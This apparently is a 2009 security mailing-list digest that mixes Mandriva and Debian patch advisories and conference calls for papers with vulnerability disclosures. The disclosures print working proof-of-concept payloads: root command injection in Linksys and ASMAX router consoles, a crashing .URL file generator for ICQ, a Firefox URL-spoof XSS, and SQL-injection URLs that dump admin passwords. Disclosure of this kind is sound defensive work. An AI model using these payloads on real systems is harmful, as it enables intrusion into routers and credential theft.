Linksys WAG54G2 Web Management Console Local Arbitrary Shell Command Injection Vulnerability
1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. 2. When logged into web management console, it is possible to execute commands as root (tested on firmware: V1.00.10). 3. PoC: GET /setup.cgi?ping_ipaddr1=1ping_ipaddr2=1ping_ipaddr3=1ping_ipaddr4=1ping_size=60ping_number=1ping_interval=1000ping_timeout=5000start=Start+Testtodo=ping_testthis_file=Diagnostics.htmnext_file=Diagnostics.htmc4_ping_ipaddr=1.1.1.1;/bin/ps auxmessage= HTTP/1.1 Host: 192.168.1.1 Authorization: Basic YWRtaW46YWRtaW4= HTTP/1.0 200 OK sh: cannot create 1: Unknown error 30 killall: pingmultilang: no process killed killall: 2: no process killed PID Uid VmSize Stat Command 1 root284 S init 2 rootSWN [ksoftirqd/0] 3 rootSW [events/0] 4 rootSW [khelper] 5 rootSW [kthread] ... 4. Note that it is needed to supply valid user/password (Authorization HTTP header). 5. One could try to exploit this issue remotely (using CRSF) assuming that a victim did not change default password to the web management. 6. The vendor (Cisco) was contacted in march '09 and confirmed the issue (but still it remains unpatched). 7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
?php /* ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ If the resulting file is placed on the desktop, against ex. xp sp3 process explorer.exe will exit with code 1282 (0x502) that is ERROR_STACK_BUFFER_OVERRUN and crash infinitely, you cannot even browse a folder if the file is present in it Solution: disable the shell extension, you may try shellexview by nirsoft Note (added 30/05/2009, remote vector added): it works with network folders too ... against a win2k3 where explorer.exe is not patched with /GS flag: (f44.104): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi= eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 SHLWAPI!Ordinal400+0x2d: 772a533f 668906 mov word ptr [esi],axds:0023:00610061= - 0:010 g (f44.104): Access violation - code c005 (!!! second chance !!!) eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi= eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 SHLWAPI!Ordinal400+0x2d: 772a533f 668906 mov word ptr [esi],axds:0023:00610061= - 0:010 gn eax=0001 ebx= ecx= edx= esi= edi=0001 eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246 SharedUserData!SystemCallStub+0x4: 7ffe0304 c3 ret prepare a network folder with the .url file inside. This works against Internet Explorer too by a hyperlink to the network folder */ $x = [InternetShortcut]\x0d\x0a. URL=.str_repeat(\x61,2184); file_put_contents(9sg_poc.url,$x); ? #original url: http://retrogod.altervista.org/9sg_icq_dos.html
[ MDVSA-2009:125 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:125 http://www.mandriva.com/security/ ___ Package : wireshark Date: May 31, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0 ___ Problem Description: A vulnerability has been identified and corrected in wireshark: o Unspecified vulnerability in the PCNFSD dissector in Wireshark 0.8.20 through 1.0.7 allows remote attackers to cause a denial of service (crash) via crafted PCNFSD packets (CVE-2009-1829). This update provides Wireshark 1.0.8, which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1829 http://www.wireshark.org/security/wnpa-sec-2009-03.html ___ Updated Packages: Mandriva Linux 2008.1: a0d083f369bffd3dfa46aa1df793ced1 2008.1/i586/dumpcap-1.0.8-3.1mdv2008.1.i586.rpm 556318aacdfd7d48ad44a7191092acd6 2008.1/i586/libwireshark0-1.0.8-3.1mdv2008.1.i586.rpm 861b059fa767f485833ad7192ac5ca2c 2008.1/i586/libwireshark-devel-1.0.8-3.1mdv2008.1.i586.rpm 8c2b35c5dfd76a22eb346e42bbb34155 2008.1/i586/rawshark-1.0.8-3.1mdv2008.1.i586.rpm 348c0c15f2e855b4c7a0348d34ea09fe 2008.1/i586/tshark-1.0.8-3.1mdv2008.1.i586.rpm 6cdb4bcd35b66c7e7a22015335dd292f 2008.1/i586/wireshark-1.0.8-3.1mdv2008.1.i586.rpm 13b1982a9621bdc39d4d97afc45b8cd5 2008.1/i586/wireshark-tools-1.0.8-3.1mdv2008.1.i586.rpm 764d085469658662ac2911fa64ff3ddd 2008.1/SRPMS/wireshark-1.0.8-3.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f81a7484841903392600faaf424c9b0f 2008.1/x86_64/dumpcap-1.0.8-3.1mdv2008.1.x86_64.rpm 4f702d98ddc5c0c856737c3c8218120a 2008.1/x86_64/lib64wireshark0-1.0.8-3.1mdv2008.1.x86_64.rpm ba6fb67f3106d9e11d28c29c925bb79a 2008.1/x86_64/lib64wireshark-devel-1.0.8-3.1mdv2008.1.x86_64.rpm b5017da51fd24e944f30753ff799a7dd 2008.1/x86_64/rawshark-1.0.8-3.1mdv2008.1.x86_64.rpm 5ea24ffef5972d5080cb986d0b7f8aa7 2008.1/x86_64/tshark-1.0.8-3.1mdv2008.1.x86_64.rpm 83d8494632a64f4184cad21f0ff2070a 2008.1/x86_64/wireshark-1.0.8-3.1mdv2008.1.x86_64.rpm e446d9a365b467d17b829f156f88bcad 2008.1/x86_64/wireshark-tools-1.0.8-3.1mdv2008.1.x86_64.rpm 764d085469658662ac2911fa64ff3ddd 2008.1/SRPMS/wireshark-1.0.8-3.1mdv2008.1.src.rpm Mandriva Linux 2009.0: c601d5a72e97b879878a3d94d6b07682 2009.0/i586/dumpcap-1.0.8-3.1mdv2009.0.i586.rpm cbc6e9bfe4055a4e3a486ad7d9d5d1d6 2009.0/i586/libwireshark0-1.0.8-3.1mdv2009.0.i586.rpm 7e15d3c389aec169bba4cbc3ca3e743e 2009.0/i586/libwireshark-devel-1.0.8-3.1mdv2009.0.i586.rpm 8b54b7755dc4c23d5c5aabce2cc8c93b 2009.0/i586/rawshark-1.0.8-3.1mdv2009.0.i586.rpm 4747a553908057b86c042759f78976ea 2009.0/i586/tshark-1.0.8-3.1mdv2009.0.i586.rpm 736173032c8f0dc38f358196f092429b 2009.0/i586/wireshark-1.0.8-3.1mdv2009.0.i586.rpm e8aa27a3ca2cf82599fc4c84044ff5ba 2009.0/i586/wireshark-tools-1.0.8-3.1mdv2009.0.i586.rpm 2bae0ecb6b260cfe69f81afbcfe7ecb3 2009.0/SRPMS/wireshark-1.0.8-3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 7878ec348dd2a4543d6704acf6847bf1 2009.0/x86_64/dumpcap-1.0.8-3.1mdv2009.0.x86_64.rpm 5bf724ce33c315dda9d419132cb5c3f7 2009.0/x86_64/lib64wireshark0-1.0.8-3.1mdv2009.0.x86_64.rpm 003c4fc644bbd55a5387a5840f071c2d 2009.0/x86_64/lib64wireshark-devel-1.0.8-3.1mdv2009.0.x86_64.rpm bfe8072577a4ec90e189bdcf9c595347 2009.0/x86_64/rawshark-1.0.8-3.1mdv2009.0.x86_64.rpm bdc71f63874e7d26bb38d2c0bb9e3704 2009.0/x86_64/tshark-1.0.8-3.1mdv2009.0.x86_64.rpm ebeff9070be842e8f76d197fcd9ab63d 2009.0/x86_64/wireshark-1.0.8-3.1mdv2009.0.x86_64.rpm 87471e79b554ed396eafc35e38018cfe 2009.0/x86_64/wireshark-tools-1.0.8-3.1mdv2009.0.x86_64.rpm 2bae0ecb6b260cfe69f81afbcfe7ecb3 2009.0/SRPMS/wireshark-1.0.8-3.1mdv2009.0.src.rpm Mandriva Linux 2009.1: e78195d23cfe382e968c7d2c06640c0d 2009.1/i586/dumpcap-1.0.8-3mdv2009.1.i586.rpm 28f331ffb584965eaf6007c5e7cf1256 2009.1/i586/libwireshark0-1.0.8-3mdv2009.1.i586.rpm d274ad81b779b568d29935701123c5fd 2009.1/i586/libwireshark-devel-1.0.8-3mdv2009.1.i586.rpm dab42aa9f71d2f6f0027cd535a88212b 2009.1/i586/rawshark-1.0.8-3mdv2009.1.i586.rpm 7ed28537628436176c78efb085e83629 2009.1/i586/tshark-1.0.8-3mdv2009.1.i586.rpm b493d446f0167ccd9c1aed81f64b14c7 2009.1/i586/wireshark-1.0.8-3mdv2009.1.i586.rpm 9edec3502b5a361ecbcdd03000d14689 2009.1/i586/wireshark-tools-1.0.8-3mdv2009.1.i586.rpm 461b4a5ca1fd68d46e6d9456284c39e7 2009.1/SRPMS/wireshark-1.0.8-3mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 02025763727e6c694ea55db8c3fd754d 2009.1/x86_64/dumpcap-1.0.8-3mdv2009.1.x86_64.rpm b33f175e526d24e581cbeffc1ece9371
FIREFOX URL space character SPOOF
Vulnerability: == Firefox browser address bar in dealing with the URL, the URL and the status bar when the space character, there is no reasonable encoding of the URL. Blank characters behind the malicious code will be hidden. An attacker can construct a space with a long URL to the URL to deceive. Exploit: == if other site there is a XSS vulnerability, such as: a href='http://127.0.0.1/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%73%63%72%69%70%74%3E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%67%2E%63%6E%27%3C%2F%73%63%72%69%70%74%3E'test/a http://127.0.0.1; which there is a XSS. When you put the code above, save it as a HMTL file, and then run. You can see the Firefox status bar, malicious code has been hidden, because of space.While convenient for users to view, but space is shielding the user's eyes. I think the Firefox status bar in dealing with the space and the address bar, it should be URL encoded. At the same time, the focus on convenience, but also to focus on safety. === xisigr[topsec] xis...@gmail.com
[SECURITY] [DSA 1807-1] New cyrus-sasl2/cyrus-sasl2-heimdal packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1807-1secur...@debian.org http://www.debian.org/security/ Nico Golde June 1st, 2009 http://www.debian.org/security/faq - -- Package: cyrus-sasl2, cyrus-sasl2-heimdal Vulnerability : buffer overflow Problem type : remote Debian-specific: no Debian bug : 528749 CERT advisory : VU#238019 CVE ID : CVE-2009-0688 James Ralston discovered that the sasl_encode64() function of cyrus-sasl2, a free library implementing the Simple Authentication and Security Layer, suffers from a missing null termination in certain situations. This causes several buffer overflows in situations where cyrus-sasl2 itself requires the string to be null terminated which can lead to denial of service or arbitrary code execution. Important notice (Quoting from US-CERT): While this patch will fix currently vulnerable code, it can cause non-vulnerable existing code to break. Here's a function prototype from include/saslutil.h to clarify my explanation: /* base64 encode * in -- input data * inlen -- input data length * out -- output buffer (will be NUL terminated) * outmax -- max size of output buffer * result: * outlen -- gets actual length of output buffer (optional) * * Returns SASL_OK on success, SASL_BUFOVER if result won't fit */ LIBSASL_API int sasl_encode64(const char *in, unsigned inlen, char *out, unsigned outmax, unsigned *outlen); Assume a scenario where calling code has been written in such a way that it calculates the exact size required for base64 encoding in advance, then allocates a buffer of that exact size, passing a pointer to the buffer into sasl_encode64() as *out. As long as this code does not anticipate that the buffer is NUL-terminated (does not call any string-handling functions like strlen(), for example) the code will work and it will not be vulnerable. Once this patch is applied, that same code will break because sasl_encode64() will begin to return SASL_BUFOVER. For the oldstable distribution (etch), this problem will be fixed soon. For the stable distribution (lenny), this problem has been fixed in version 2.1.22.dfsg1-23+lenny1 of cyrus-sasl2 and cyrus-sasl2-heimdal. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 2.1.23.dfsg1-1 of cyrus-sasl2 and cyrus-sasl2-heimdal. We recommend that you upgrade your cyrus-sasl2/cyrus-sasl2-heimdal packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1-23+lenny1.dsc Size/MD5 checksum: 1775 510a3befa02a034758711c4bf329082e http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1-23+lenny1.diff.gz Size/MD5 checksum:76458 85b876ee4b8d33a804f1164d727a5281 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1-23+lenny1.dsc Size/MD5 checksum: 1930 6939422cb0ce3455ce5a1a494692fd68 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1.orig.tar.gz Size/MD5 checksum: 1370731 f196299b2c07f822c8c56db71b7dc7db http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1.orig.tar.gz Size/MD5 checksum: 1370731 f196299b2c07f822c8c56db71b7dc7db http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1-23+lenny1.diff.gz Size/MD5 checksum:27834 dae4de4ce221e8d5f9ca9fbc8376f1ba Architecture independent packages: http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-doc_2.1.22.dfsg1-23+lenny1_all.deb Size/MD5 checksum: 104228 c5b2a9dac2683208cbc7fe0aeaf9e276 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_alpha.deb Size/MD5 checksum:84954 9d18b6afabcdb581ba692b0de7abc489
[ MDVSA-2009:124 ] apache
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:124 http://www.mandriva.com/security/ ___ Package : apache Date: May 31, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in apache: Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm (CVE-2008-1678). Note that this security issue does not really apply as zlib compression is not enabled in the openssl build provided by Mandriva, but apache is patched to address this issue anyway (conserns 2008.1 only). Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via wildcards in a pathname in an FTP URI (CVE-2008-2939). Note that this security issue was initially addressed with MDVSA-2008:195 but the patch fixing the issue was added but not applied in 2009.0. The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file (CVE-2009-1195). This update provides fixes for these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1195 ___ Updated Packages: Mandriva Linux 2008.1: 7ec559d730fe009bdf1e4a78acd0d826 2008.1/i586/apache-base-2.2.8-6.2mdv2008.1.i586.rpm 52e9047dd9922fb706e1ae661ffec647 2008.1/i586/apache-devel-2.2.8-6.2mdv2008.1.i586.rpm 057298a3f2fd895fc341925ef1f68851 2008.1/i586/apache-htcacheclean-2.2.8-6.2mdv2008.1.i586.rpm 171068e2dfc51397c07a9d3fd548f1b6 2008.1/i586/apache-mod_authn_dbd-2.2.8-6.2mdv2008.1.i586.rpm 822918ddb258642c9213d338b98c14fb 2008.1/i586/apache-mod_cache-2.2.8-6.2mdv2008.1.i586.rpm 8a2b046526ebe44fd849a9e9858e0494 2008.1/i586/apache-mod_dav-2.2.8-6.2mdv2008.1.i586.rpm 23bbfb62795eff6c23ef689a2193fb8f 2008.1/i586/apache-mod_dbd-2.2.8-6.2mdv2008.1.i586.rpm 2189ba0bfee1364eb4416418db4258e1 2008.1/i586/apache-mod_deflate-2.2.8-6.2mdv2008.1.i586.rpm 2c5506127b9b3caa25910bcf6d5953cc 2008.1/i586/apache-mod_disk_cache-2.2.8-6.2mdv2008.1.i586.rpm 63492ccf2e9a89ff791f491f99bfc23c 2008.1/i586/apache-mod_file_cache-2.2.8-6.2mdv2008.1.i586.rpm 38e9f510daf9bf904f1f9b8471030650 2008.1/i586/apache-mod_ldap-2.2.8-6.2mdv2008.1.i586.rpm 37ed8ed4614e45e2188b6d714c8530ed 2008.1/i586/apache-mod_mem_cache-2.2.8-6.2mdv2008.1.i586.rpm f083445d93d7e8f0035b10777234ef38 2008.1/i586/apache-mod_proxy-2.2.8-6.2mdv2008.1.i586.rpm 7ecc1ff5e58835c0323626116c93725d 2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.2mdv2008.1.i586.rpm 9cf62f5b52508dedb470f9b980d6d4d5 2008.1/i586/apache-mod_ssl-2.2.8-6.2mdv2008.1.i586.rpm b378b2b4103f5876ce746233173278e5 2008.1/i586/apache-modules-2.2.8-6.2mdv2008.1.i586.rpm c78663fdace7ec31eeae3e9a0c01619a 2008.1/i586/apache-mod_userdir-2.2.8-6.2mdv2008.1.i586.rpm cc2281cf44d7271cf507071c65d46309 2008.1/i586/apache-mpm-event-2.2.8-6.2mdv2008.1.i586.rpm 8161574d6883d29318276b974a3bd95d 2008.1/i586/apache-mpm-itk-2.2.8-6.2mdv2008.1.i586.rpm 59a4bfb20f243d274f6d3267dd8621cb 2008.1/i586/apache-mpm-prefork-2.2.8-6.2mdv2008.1.i586.rpm cc2f58f832848ace53b18fbfb272fb83 2008.1/i586/apache-mpm-worker-2.2.8-6.2mdv2008.1.i586.rpm 86b2fe589d35fd6821d5994b0efa0aa2 2008.1/i586/apache-source-2.2.8-6.2mdv2008.1.i586.rpm 390895e36f7c0863501a429d6583ee02 2008.1/SRPMS/apache-2.2.8-6.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 520bd0c278ebae63de0f4479da178124 2008.1/x86_64/apache-base-2.2.8-6.2mdv2008.1.x86_64.rpm e254c98a6796b826f09eea2fab69170f 2008.1/x86_64/apache-devel-2.2.8-6.2mdv2008.1.x86_64.rpm 26d424de3c58a585a266533ee9fe3718 2008.1/x86_64/apache-htcacheclean-2.2.8-6.2mdv2008.1.x86_64.rpm d95d814fc660560124428cd0c8093611 2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.2mdv2008.1.x86_64.rpm
OCS Inventory NG 1.02 - Multiple SQL Injections
OCS Inventory NG - Multiple SQL Injections (May 30 2009) ___ * Product Open Computer and Software (OCS) Inventory NG (http://www.ocsinventory-ng.org/) * Vulnerable Versions OCS Inventory NG 1.02 (Unix) * Vendor Status Vendor has been notified and the vulnerability has been fixed. * Details The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface. It was found that the application does not properly sanitize user input which results into multiple SQL injections. Affected are the following scripts: - download.php (parameters `N', `DL', `O' and `V') - group_show.php (parameter `SYSTEMID'); * Impact Attackers may be able to manipulate SQL statements in such a way that they can retrieve, create or modify information stored in the database. Furthermore, the SQL injection might allow attackers to get a foothold on the underlying system. * Exploit The vulnerability can be exploited by just using a web browser: http://example.org/ocsreports/download.php?n=1dl=2o=3v=4'union+all+select+concat(id,':',passwd)+from+operators%23 ___ http://www.leidecker.info/advisories/2009-05-30-ocs_inventory_ng_sql_injection.shtml Nico Leidecker - http://www.leidecker.info
ASMAX AR 804 gu Web Management Console Arbitrary Shell Command Injection Vulnerability
1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. 2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface. 3. When 'system' paramether is passed to the script it allows running OS shell commands (as root). 4. PoC: GET request to: http://192.168.1.1/cgi-bin/script?system%20whoami Returns: root 5. Using CSRF attack one could remotely own a router using for example simple img html tags pointing to http://192.168.1.1/... 6. The issue was tested on firmware: 66.34.1 7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched). 8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise
CFP 26C3 / 26th Chaos Communication Congress
26C3: Here Be Dragons 26th Chaos Communication Congress December 27th to 30th, 2009 Berlin, Germany http://events.ccc.de/congress/2009/ Overview is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany.First held in 1984, it since has established itself as the European Hacker Conference attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. We want you to join and be a part of this unique event which serves as a public platform for cross-culture inspiration and borderless networking. 26C3 is fun! Topics == The 26C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration. Society --- Technology development causes great changes in society and will determine our future. This category is for all talks on subjects like surveillance practices, censorship, hacker tools and the law, intellectual property and copyright issues, data retention, software patents, effects of technology on kids, and the impact of technology on society in general. Hacking --- The Hacking category addresses topics dealing with technology, concentrating on current research with high technical merit. Traditionally, the majority of all lectures at 26C3 revolve around hacking. Topics in this domain include but are in no way limited to: programming, hardware hacking, cryptography, network and system security, security exploits, and creative use of technology. Making -- The Making category is all about making and breaking things and the wonderful stuff you can build in your basement or garage. Most welcome are submissions dealing with the latest in electronics, RepRaps, lasers, 3D-printing, climate-change survival technology, robots and flying UAVs, steam machines, alternative transportation tools, guerilla-style knitting, and wearable hardware hacks. Science --- The Science category covers current or future objects of scientific research that have the potential to radically change our lives, be it basic research or projects conducted for the industry. We are looking for talks and papers on the state of the art in this domain, covering subjects such as nano technology, quantum computing, high frequency physics, bio-technology, brain-computer interfaces, genetic hacking and hackteria, automated analysis of surveillance cctv, map-making, psychogeography etc. Culture --- Shaping the world we live in means making it more interesting, entertaining and beautiful. The hacker culture has many facets ranging from electronic art objects, stand-up comedy, geek entertainment, video game and board game culture, electronically generated music, 3D art, and everything that bleeps and blinks to e-text literature and beyond. If you like to show your art and teach others how to make their lives more enjoyable, this category is for you. Community - In addition to individual speakers the Chaos Communication Congress is also inviting groups such as developer teams, projects and activists to present themselves and their topics. Developer groups are also encouraged to ask for support to hold smaller on-site developer conferences and meetings in the course of the Congress. Further Information === The Chaos Communication Congress is a non-profit oriented event and speakers are not paid. However, financial help on travel expenses and accommodation is possible. It needs to be agreed upon after acceptance of the submission, though. Don't be shy and state your requirements in the application when submitting your lecture and we'll work something out! You can find the preliminary agenda and additional information on our 26C3 website at http://events.ccc.de/congress/2009/. For further information and questions please feel free to contact 26C3- content (at) cccv.de Submissions === All proposals must be submitted online using our online lecture submission system at https://cccv.pentabarf.org/submission/26C3. Please follow the instructions given there. If you have any questions regarding your submission, feel free to contact us at 26C3-content (at) cccv.de but do NOT submit your lecture via e-mail. Language 26C3 is an international event and we want to have a lot of interesting talks in English for the benefit of our growing number of international guests. So ideally we are looking for speakers who can give lectures and/or workshops in either English or German. But while we are interested in maximizing the quality of presentations, the topic and its
MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades Attendance v-3.2.6 --
-- MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades Attendance v-3.2.6 -- -- CMS INFORMATION: --WEB: http://www.onlinegrades.org/ --DOWNLOAD: http://www.onlinegrades.org/ --DEMO: http://www.onlinegrades.org/demo_info --CATEGORY: CMS / Education --DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same features plus many new features. OG is a web based grade... --RELEASED: 2009-02-05 CMS VULNERABILITY: --TESTED ON: firefox 3 --DORK: Powered by Online Grades --CATEGORY: SQL INJECTION --AFFECT VERSION: = 3.2.6 --Discovered Bug date: 2009-05-21 --Reported Bug date: 2009-05-21 --Fixed bug date: Not fixed --Info patch: Not fixed --Author: YEnH4ckEr --mail: y3nh4ck3r[at]gmail[dot]com --WEB/BLOG: N/A --COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. --EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # SQL INJECTION (SQLi): # --- PROOFS OF CONCEPT: --- -++ Condition: magic quotes=OFF +- - Condition: Be a registered user: Parent, Student or faculty ++- [++] GET var -- 'ADD' [++] File vuln -- 'parents.php' ~ http://[HOST]/[PATH]/parents/parents.php?func=mailtoADD=-1%27+UNION+ALL+SELECT+user()%23 -++ Condition: magic quotes=OFF +- [++] GET var -- 'key' [++] File vuln -- 'index.php' ~ http://[HOST]/[PATH]/?action=resetpasskey=-1%27+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11%23 [++[Return]++] ~ user or version in DB. -- EXPLOITS: -- ~ http://[HOST]/[PATH]/parents/parents.php?func=mailtoADD=-1%27+UNION+ALL+SELECT+concat(client_id,0x3A3A3A,client_pw)+FROM+ADMINS+WHERE+id=%271 ~ http://[HOST]/[PATH]/?action=resetpasskey=-1%27+UNION+ALL+SELECT+1,concat(client_id,0x3A3A3A,client_pw),3,4,5,6,7,8,9,10,11+FROM+ADMINS+WHERE+id=1%23 [++[Return]++] ~ client_id:::client_pw in 'ADMINS' table ### ### ##***## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##***## ##---## ##***## ## GREETZ TO: SPANISH H4ck3Rs community!## ##***## ### ###
FRHACK 2009 Final Call For Papers extended
FRHACK 01, Besançon - France 2009 September 7-8 9-11 http://www.frhack.org by hackers, for hackers ## Final Call For Papers ## The Call For Papers for FRHACK 2009 is extended The deadline for submissions is the 30th of June. For more information, please visit http://frhack.org/cfp.php Registration for Trainings/Workshops and the Conference is open http://frhack.org/register.php LinkedIn group: http://www.linkedin.com/groups?gid=1613377 See you soon for FRHACK! Jerome Athias Main organizer Do you like good wine, french bread food, strikes and the french kiss? If so, you will love FRHACK!
Re: MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1--
I'm sorry. This system calls Small Pirate, not Small Pirates. Mea culpa ;)
[SECURITY] [DSA 1808-1] New drupal6 packages fix insufficient input sanitising
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1808-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris June 01, 2009 http://www.debian.org/security/faq - Package: drupal6 Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE ID : no CVE id yet Debian Bug : 529190 531386 Markus Petrux discovered a cross-site scripting vulnerability in the taxonomy module of drupal6, a fully-featured content management framework. It is also possible that certain browsers using the UTF-7 encoding are vulnerable to a different cross-site scripting vulnerability. For the stable distribution (lenny), these problems have been fixed in version 6.6-3lenny2. The oldstable distribution (etch) does not contain drupal6. For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 6.11-1.1. We recommend that you upgrade your drupal6 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2.diff.gz Size/MD5 checksum:21561 55998c89be8cde527e192e57b7c439d5 http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2.dsc Size/MD5 checksum: 1132 7d8a825a0e670972ab6dd4ee98c341c4 http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz Size/MD5 checksum: 1071507 caaa55d1990b34dee48f5047ce98e2bb Architecture independent packages: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2_all.deb Size/MD5 checksum: 1088692 fc0fd6e5d35869f6b8bc692fe7183248 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and 